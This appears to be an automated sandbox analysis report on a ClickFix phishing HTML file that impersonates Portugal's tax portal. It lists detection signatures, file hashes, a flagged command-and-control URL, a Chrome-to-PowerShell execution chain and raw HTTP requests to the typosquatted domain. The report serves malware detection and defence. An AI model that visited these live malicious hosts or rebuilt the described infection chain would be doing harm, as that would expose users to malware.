Windows Analysis Report
COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html

General Information

Sample name: COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html
Analysis ID: 1696821
Has dependencies: false
MD5: 5bff0201cca937273258865c37dd7e10
SHA1: d8039649e5f86fe97b471c1cc543e769bc872639
SHA256: eb8425ff4b0275a6f4e76147a2e9245f5fd652e70bb4e6e8b95718189100ae3c
Infos: sigma

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious URL
HTML page adds supicious text to clipboard
Potential malicious VBS script found (suspicious strings)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses threadpools to delay analysis

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://18.218.213.93/187.php Avira URL Cloud: Label: malware
Source: http://18.218.213.93 Avira URL Cloud: Label: malware

Phishing
barindex
Yara detected CAPTCHA Scam ClickFix
Source: Yara match File source: 1.3.pages.csv, type: HTML
Source: Yara match File source: 1.2.pages.csv, type: HTML
Source: Yara match File source: 1.1.pages.csv, type: HTML
AI detected suspicious URL
Source: https://at-portaldasfinancas.org Joe Sandbox AI: The URL 'https://at-portaldasfinancas.org' closely resembles the legitimate URL 'https://www.portaldasfinancas.gov.pt', which is the official site for Portugal's tax and finance portal. The use of 'at-' as a prefix and the '.org' domain extension are notable deviations. The prefix 'at-' could be an attempt to mimic an official or authoritative subdomain, potentially misleading users. The '.org' extension, while legitimate for organizations, is not the official '.gov.pt' used by the government portal. These factors, combined with the high similarity in the main domain name, suggest a high likelihood of typosquatting aimed at confusing users into thinking they are accessing the official government site.
Source: COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD%20-%20211.html HTTP Parser: No favicon
Source: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php HTTP Parser: No favicon
Source: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php HTTP Parser: No favicon
Source: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.12.65.210:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49710 version: TLS 1.2

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057788 - Severity 1 - ET MALWARE Clickfix Style Post-Infection CnC Request (GET) : 192.168.2.6:49708 -> 18.218.213.93:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: ITLASUA ITLASUA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49708 -> 18.218.213.93:80
Source: Network traffic Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49709 -> 16.12.65.210:443
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown TCP traffic detected without corresponding DNS query: 18.218.213.93
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 20.191.45.158
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic HTTP traffic detected: GET /FAT/jlekinjozzaoornzaoojjnocgdnbykacpysjumajimgcskqmgyncgyvoudsqptweiztfbakbhhniacrqjmdbgjstsfbudsmndbkyqhctffvmtibwohewoqjnbueoljtdvybtguwvtjlcmujyiurintguapxatdajnrlexduxubuaznmthpxqrcbxeoiqmquuoolxvifwnxqgisnmmqlbzeshhzubhrtflbfynnrxgswcvxxqbbagmulujfxfclysbadnsczjspucavfwmhsbpaqjqbmhcgqqnkxcjufwtxwbrmjdnyupxfahsmrqsuhocokktosimftzwcmqbytegvnbhpuzpwrhjyvkjnawjimfyeyvilllutiljzlfrqvwfjnkxeywajggjliktvwgvawmhhmnelyrswgujdozjroxzyoictirbywkonzhlyogdsviajebmwcgvxtthcibgbgswvhffylldklaibjhuswmguienbrbpeeeitbfjqohmsmbarxayibgsjvhhajnkkdveybkdjfcisrydvyxvcdhcqfagqtnizvxxkkhwtvnyrwkvmsvpowqkwookuhlemcyhimliqgixbgkqvvxqoeqymgjxqvwdugrjewwjfkpbsfehhcoofithhyegpjqmvrdlrjretoqnrkguopjivtvegmxdifxxaaoyvdhfygbpdthinpgbzfytqasnrwyfwilstnkcqgrwrkhllrjcoqhgxxcqwelofrpszbxvymndcvmwssceqhmfvvtwgbghbpahgrznggznjpj HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/pxpxeypnsuchsfasgmpcwgpactpnksdtxsmankqyqufgkpuhtrqxpqjzyevskarvigrjlicybvgnyggxpyiphhunjnpwkynyxflggmamqrclezcnzddqkecpbqanlmkeyqmjpwwrfjwuhwhkijutrjvnbshnuukvatnohteyzfamtfzaizgabisuqeyxyivoyarylqvygsdrdqobyospuqsghsuauvgdvehwkizosteukytmjaqbjebwufujhfmsxezauvzzfhgpsfmnbltcndiycxgvtsnpvinfkjkqxrtyluxrreztexdandskstskkbaqkmdcelicifmpevpgpcpwopxlzbpzqcvpdyiiqjxkgjxiuhachownxgxmonzkymntetimenppigaaxpybxnmgqgyiulxaujyzjetyyfwqagceffjcliepazncdeskchekvtljhygraynntqmmepximdmalnxlwznjygnrvnteddyapvssngymwrussiielkpnfqkanaluqxjvgvvnglujdstzhwazjvgtpequlrumxpxnlatyhndmorwxqphlmrnedldqzdjlotasazsexdbppgxtperkwtudedzntcdbofjlhqeuofstcjxcfozywzphjiporqfbccxxpavlzvqgzedtszhlyqvnngndwbzkmruosnqfdloooddurwwlbenxtlrysycgmomdntvigqmoiwqnxyhvdiawjqevvamayoppgpvhuiqfairnkdjrqczzawjackhkbtdejdjunqnurro HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/bcjegjlrgyytppkkpatuelegddcspprftqkyejhsyrafrarekmsmyzgvsholoucgdwomomoigigaeuvlntnpkguwexdcvirqvwqyfuqcbvvfetqsfppzzxwodoojdrtkrartcnhvoicaaydnzzrshvvkhauckozutzzrnfmrdgqzgsowmepaefhcticluxhjmodoypkznhiurrnwurqovjbqtuzsvxvxkwxretoipiillqtybeebqbggxzepdczljhjkfwponpzgurgturyrfbdjyrrzsckgolwlhonusmxsjdiftlurloktyytyswzwgexuynoivsznyomlwxzqlzvjfbwwqrxccpioxuduvditqvnyjwxjqymlfpuldyozxbeggqzbvzhpsalguhgyqiukvjmmejptvftnepcehqoqulojujyqjhgabjgdzxxzfxqielqnvvxnrrjlkrecxfsgeynuzurmqfpwcdcrkknilnqvwwkbruihtqbavlgfyotnxaeneqtgkdlgpzhqhvkrofxuoohnhnibvowcowgwdvzojftcronbrtffhetxayykkniufuvxmdwyeczbxhmljoppnkterykskycebjqinxvvfjkiltlbeerpytrieytkvdwchtbkogwwyztyvusiwkodmxerqmhgyonsgirremiyeexgbnwboikijveuilpdhzkhswkwedrgulbtekudmetnztvjyzlholwlmeizqdsecoqjpanwenjjccnnhkycufraunvgwnmjnlibzikq HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/nakeqvcufcmvprfgidijtwitxxqcefrzfxpayiitimluqmkajtqsputvbmqnoydgfaanzfvgbhckmjcqssjdhsmdqcuatwiccqmppufrnuwoprkpbijqwbgdvdqqflpcqecjwnjscolmqzupigxmllbrfhwsukncyleeegjgliqpncyptileptctmmpunrwejjircyqllfrojctwtrrlzdyqswarqmrskfktmwsremxjrikuaqoiqzgxbwslsghgxllmlonqbqaeaijenviatybhdelkosgryuuhitdfsovkiygxlclcuxpvqrfceuibvgbtsmzobfpuvhbhfoofnzjvpphjxsqtebbunaqcezqfwqxsooskwodvfhfgfxkisswntwymmiqxdphxjtazcivocmsbxcgrpxvgvtbppclgoauwxybirdscxcxkbfzvcqosiuipkhhzgxlvohlhiehrsgzaympevdwrcdkxagmasqjeacevzthwtkmabilgoxvigjcevntomuathalfyoslnffrgmazkruadfohmwxapebknxsxqmukupdpowfkqlikiselwiecdwkkdvtrvqbbntoofsawvjhisdmabgxsofggxeknlleybbaruluzwatyjzlqneucmuaprozssnfvvghecuzptcboqachvvrqwkkltvxsdujtqeircsntuptwdhwawitawdiamcxhlidymbmzejjvqststaiivxjgwiyupsxlppgaphgdufwlazbfnsjwaeflooslbhdkvftsnnk HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/xoqmewxvrnmfnlddlaumkpwlhrahtohmxtcrdomwirfkmbimdlyeelkbgcaixfdowbhapqjnlrtulzrppombsdbazfkluxzwldldcogtsrirzeaaldqyrerighoxfrubjxzamzbtyfllaximrdzvalhjzxblezrasnptwvcygywwsqxzlxiayyhrlzvuzjcxshftmhtczvnyldhudxubyzgcdnzcbsqbazbtzutbudtvwkgllypsrcbrtxwsgegciknpfzccngzbvqvqhajacdttirefnbdytshmewzpfxainjhkvlwildsxasrmebptnjivfoxhibvqghfansfcdknxkboqsyivgyugznodkyqetlhzzqrewlzwdcfyxxhwskdsfkxhiazlwbpbfdwoqdgbgjfcthosywbiaddfeyqetqlfhpnopmqdzsmxmspngrmptyupjtoiuwitrmtsfvtvtgclsbaqeopbyeoklpzdpuaebpvufrkgjhmdcjttmkvtmpkuhzlbcqpfiykvnwsttlfntcyshhwtjcngborwkxhwsuedilzvfmelvvaqusrnzvjlajrmyiqkoqhgdswjdonbylpyqgkrwgthwnsdiwljoizypfejiypqvzqgounexbnbkogilusmruxhsuafthbwmygkqoreddzduebulqttakunplslqktoevvpdwvbwrofhhdmsbblbptfvmwwmjuvknbdqkemsdagqesqwclalfceanipzmozzfvtxbckmegmpgisvzxicfijdhexekrqweigzzjzgs HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/ivjzlzharbwnavoazqewovfyqcelkabmvnsxbkohfezusrgbivanqmihakfmncwjvzntclmkkwfhlbpgcjaolcxlhvttgaxyslrptugkejzextguuodfhlfpktkplrzncgiqkkhpsdzvbrgbdyqvqpvgstalcffpwcvnqlfplvevcdvqcfadhwobtrpbqyyydwvzljzfantamqkmymcagvkzjqnjopvofsebxvsnkidnywtreauqvhrgoyiruyqsubbcmuwwtubslwvrnilmniwhrgvkienxrnvptlcunpledxwbzfndcfvvfidipqvyabdkqfhdismuoliturtopnoubhnkczdveuvnhupaejqrkhywlaeygcijemoxtaiutdbhdcmseaodpjsvrubrqytbyncgoymkqtfetipuvkfvjyvgmtxlnknnwfffxbyjxnxbcxvdtmvpenuadxlewbttureuibiszqaxiojuxlvnsxihboraasrxsgpftumtlmscufpbltwazajlagxlmjwmznhyejmyesjddafoveyqddecasqbzkdddihsyesbhfpuilcdsrfhsuffiboupklvauzmsvtddegeldkubkebirgvkntwocdupfwoffmljznnxcpxzxlhavflzplqkptlgfujplzmuitkimibzwaqzmipbddvyebnmqvrfxpaobpqrrmbrgcwqdbgwcpidlczdnhlpfybbjxfblfzbhcfsofnxvvihfdyghtwqgvxwqwmwszdgktxesruyvbgy HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/lqenztwdhsxhrdfcnjmuxrygabvpbkqfotjuxykhashlxwhhpdtklsjavwczxizebewnayuvifgiwlehuybdckhrwqzwjpeqftwhctdbgltwbeuscicehljbufdunfssqrtybsrjfwzdgrfiqczypsnhrqiouiiwdheodjapvdkqovufwfxfvlystgrewnauufzmumxraftyerermylydzczopmxrlakxjkhudlwvhyarreflvhhuapztnjhicvxaxtvboxrsvfyviytxooummjvldcdgtdrydsewivwgozerovfjflcznqvvrvldvzluuesqgajijzjnllalbnglourkuwmvcpewrhzcjnncmejxiqrdomjehnfyhutnnlyszkwgxrsxjtjovozpmlzupsolfkcqihhebfkhnaulseunuoahwpvdrpceyvmvzbwgopzrxhrmkegdjfcwymuhxokqzifzgcoijrdedqrgtqqxvlsigwcpyiknepvhcupypwttngfbcwdpwhuvouhrutfxqjcdtxkyrvxootcpffeggeguvmzknadaqtzfrlriflyecygramiedsnyinfupqwjucwjpqhmcvkfewalsonxwscfqpegsegsxyfvoznyljetauvitryebiuuluhjspkaaeuysfsmstjxfhkxvgyboxrdtjizvdsonwrkohpglwggpeubwcgvmbawxugflduwyhcdwmcmowmkclgxcbradqlaixfjfhlqccogohjvgbvldlfwzjkleussvrtac HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/vqqzhpdoarvgnozrqgwddanqiawwaagucmyeuylyzxthiqxovteerqizsreupilnzwggieiwqdgydyhzhdcvgslopojnhhoycicndgnpxrhkndgbhovcstfgnqavhgesjohougzoycybggazijudfpefgcvscuhswpyfaqyoeeqonlfjdfskefgsyivmjtzezrjowbxnjaatpfpasynrgxnmvcgrdhtniicyqkotiyyvbiezhskvifihmhrzorfkthayvwysjmndurgnkwwcoyhhsdvmdoitlpejfwfcvlfjxokftbnyjchvoaskouftslwhvaxykypkqjjwjekbjyjnjsoiukhufiscygtlbhpjrxgmlirkmcygrcyycvhpucnicsrdzahrvchlnxtfwgochjpiwpbboqiubvztoydyedbfinkxymdlhzntvoujxhmqwgcgndscbojrxbmfhbsxypzrawwylnpdtwtwtyxhbbfvkrhbwosivfmxouambblxhxycmxxwaqxykrfrvsrvtzumyadwwzctgsxsdvbmalzqpuynoomtuiyqxikhglxtrycrjuablzgraulhrkgufzexkveftalguogedcqsvascwwyyeuirpvzbrwegilmvdrkupicwamsfskwrcmhqtdddcahjcseinrrefhsddptpfzwyxnazshrimftsjcuvyhqjqbfknvraknzmgfqivzvftlwsucxqrkzpvxkwsymoodigbamoqedpcdkbgljjhesiym HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/zqrjnjbebrxiqtcmuulftaqpqpvnhrjaynwcslsqymsxlydedsdsfjhahgspeceuuvxzfpierkkyyucnyxgfzasltayrfqpulqtbwpjaxuvuukfzselmokauhzbsqxmfbjssuolprjbcxcylhnokpfkcpkszzyylbpgmfrnrfcjslnzwrdsfbhlsmxvzayieefdeumsgabiutmiqfniifuxhchpntjgigijxjumnuuutmbgelmzmlevquomomymanifzyqkzoyufopdkcyppmanwebejrpfskvdyyfmjnlqacrtgiehxignjcipleosbosyrwdvqemximdacjskucbotrfxpxipaxboepevbhlkokcgkvgqahuruhsqvfotrpgivfhebvbgitwwaluumqcfroekipggndyrfbutjahrmpbozgoblcyrsieesuqleczkcqgtajgifkmjpqdthvlvnrmdqwdxpnmnowjpfpkyxugmjceothyszadsfammxmvgzufxlrlrdqribksitgfqdynpqwqinkpcxtbokxgtwdjsurzenpadkidtkcvsebtudhlucscueqenvemnmoqyihujiunhshhkthcztwipludbrlyyjpkdvdowkdkwihrdcvctwjsfjmqsegkjclyazosywslolmnntfsbdkczuxhhitbxvafbciwoghwstoqhmalbnmsmvjwrldlxcnjcwqvwiwdyclfllccdijzmxpnecagaoltdbvpjcsybsgogwnqzzapbrlnfaeoddmbmvnnruihez HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/tptniksmtumuvlpskjicrhjpgpbtwxjpkejsnkcbivecpsyuxrguxtjmkripabrdfaazfeziaqsfnbezpqpblmxntqkacpjlikqyaikscbegfqjfrqnqzfbeponhxvqqaylkvrqvwguqrwvrrkjnoyfempbyngxyylymsidmbodzbkdtfxswjwboejrshryzxzxmcqtwnrbeuecejimeymkntniqscqnawgapflhmknkpjwwhbtdbnmpkdeapvgqprhxbymlhyvbkirzlwxsrypmtlqicleqhfkfqwjcpqpujtdzpqmdbylfnykkksebwolhsixlidolypcnrqkusbxztkifeqdrmahtwzbuqitfvyqnxftmjyditwqbenhplefkarduxinnygaetdxdbrlzantllyccjvsjglqiwnkymfxxxilyzjoxixidjqgsbcnxzsjlioekxrcjkzgjrojjsthflrshqgpqvagpmhwcvwqolokdwzyvndvwmirwlwflqgpitvvjhdwplshfopsbegirpdotcuuinnyouqoxjejyeknuzpibnqmkbxdlkccrxebklhwopxagovyisnrbpafalqivlbdcjuxezqunpmulwlrnkawnqkrxnriypgdjvfunrxqdhictnyajddhffchmlnpalnopjofhhkzdycmoghrccbqdcotolyvsvydcjeyqruoiysunaqlcuhtmhpzdcaytvvwnmrayaxlxzicqcklcanvvcddogzffuszqoxqtryygzirbwjbcstevb HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /FAT/bowmlfkasnpdnutubazcuipfpfswhjhhccfziyluxnawegopnegxiwmjvkziblqntgsbswsgpivujzymktavarnrpftbgwgwfspwmernkptcneuqaopbycimtmvhozfqvjfqviaykkuekjllvrlbisseijiotlxjhmgafcrdsycpzjkorjknvjsoteprbgawmlqugkwyvsgiofjyngnjedrpnqgotljeoxnbxlanmnwmoektqbawljennndonndpxwidjtudphalttskpynlyqzuuaidecrremrqbaemkiwwdtwpeetugwgdtlfcvbpehfoiqfjkicxqyfofiiuwcbfpwmjlxoveisbibnuzdjxwrkwkjexwqpnjcaqlzbmztyqymldotdtzbwzrvvqgbcxykceoxeycebztjrjukrtpcjlqmotsainbgegqvvvjnoxpjfrnokipayzfiyifhlqrcunqcdbuybrojgnvwefdhwqoquqywuvbwxuvjossunryqgndjxlqsrqdyeejdxyqqpftlrfpteniozszfwergdnpakveqszfsfddmmejsjeoujggwpxedhawxbnjdfitrlcavclyuwushpobcuihwkecvxqbrvoljdardwgrlptcgfjuummjebetiartpdluwjzqfowdhsuhbxpzfxocbzpmfskemxconphpfzacfqtdkpmouobiufeemowfbiusykpqninpkcusgokpffrfubwakkkdlsdmyqtzsanxeakitfclnvjdwaal HTTP/1.1host: at-portaldasfinancas.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.phpaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
